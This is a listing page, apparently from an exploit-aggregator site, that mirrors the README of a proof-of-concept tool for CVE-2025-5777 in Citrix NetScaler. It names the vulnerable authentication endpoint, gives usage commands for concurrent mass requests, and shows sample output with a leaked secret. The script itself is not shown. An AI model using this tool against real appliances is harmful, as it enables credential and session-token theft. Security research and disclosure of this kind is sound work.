CVE-2025-5777 PoC — NetScaler ADC and NetScaler Gateway - Insufficient input validation leading to memory overread

Source

https://github.com/zr1p3r/CVE-2025-5777

Associated Vulnerability

Title:NetScaler ADC and NetScaler Gateway - Insufficient input validation leading to memory overread (CVE-2025-5777)
Description:Insufficient input validation leading to memory overread when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server

Description

Citrix NetScaler Memory Leak PoC

Readme

# CVE-2025-5777 - Citrix NetScaler Memory Leak PoC

## 📌 Description

This script exploits a critical memory disclosure vulnerability in Citrix NetScaler ADC/Gateway appliances, identified as **CVE-2025-5777** (dubbed **CitrixBleed 2**). It triggers a memory leak through the `/p/u/doAuthentication.do` endpoint, revealing uninitialized memory containing sensitive data such as XML fragments, tokens, and potentially credentials.

* 📅 **CVE ID:** CVE-2025-5777
* ⚙️ **Impact:** Information Disclosure
* 🧑‍💻 **Author:** \[0xgh057r3c0n]
* 🧵 **Concurrency:** Asynchronous with `aiohttp`
* 📦 **Dependencies:** `aiohttp`, `colorama`

---

## 🚀 Features

* Asynchronous mass-request engine using `asyncio + aiohttp`
* Hex dump of leaked memory fragments
* Auto-detection of the `<InitialValue>` memory leak
* Verbose mode for debugging and response preview
* Graceful interrupt handling (Ctrl+C)

---

## 🧪 Usage

```bash
python3 CVE-2025-5777.py http://<target> [options]
```

### 🔧 Options

| Option          | Description                                    |
| --------------- | ---------------------------------------------- |
| `-v, --verbose` | Enable verbose debug output                    |
| `-p <proxy>`    | Use HTTP proxy (e.g., `http://127.0.0.1:8080`) |
| `-t <threads>`  | Number of concurrent requests (default: 10)    |

---

## 📥 Example

```bash
python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5
```

---

## 📤 Sample Output

```
_____________   _______________         _______________   ________   .________          .___________________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \  |   ____/          |   ____/\______  \______  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/  |____  \   ______  |____  \     /    /   /    /   /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  /       \ /_____/  /       \   /    /   /    /   /    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \/______  /         /______  /  /____/   /____/   /____/  
        \/                  \/                  \/     \/         \/       \/                 \/                             

         Citrix NetScaler Memory Leak PoC (CVE-2025-5777)
                     Author: 0xgh057r3c0n

[🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
[✔️ ] Found InitialValue Memory Leak!
[🧠] Hex Dump:
------------------------------------------------------------------------
00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21   secret="abcd123!
00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74   @#$%^&*()"</Init
00000020: 69 61 6c 56 61 6c 75 65 3e                        ialValue>
------------------------------------------------------------------------

[✔️ ] Leak confirmed. Continuing extraction...
```

---

## ⚠️ Disclaimer

> This proof-of-concept is intended for **educational and authorized security testing only**.
> Unauthorized scanning or exploitation of systems you don't own is **illegal**.

---

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!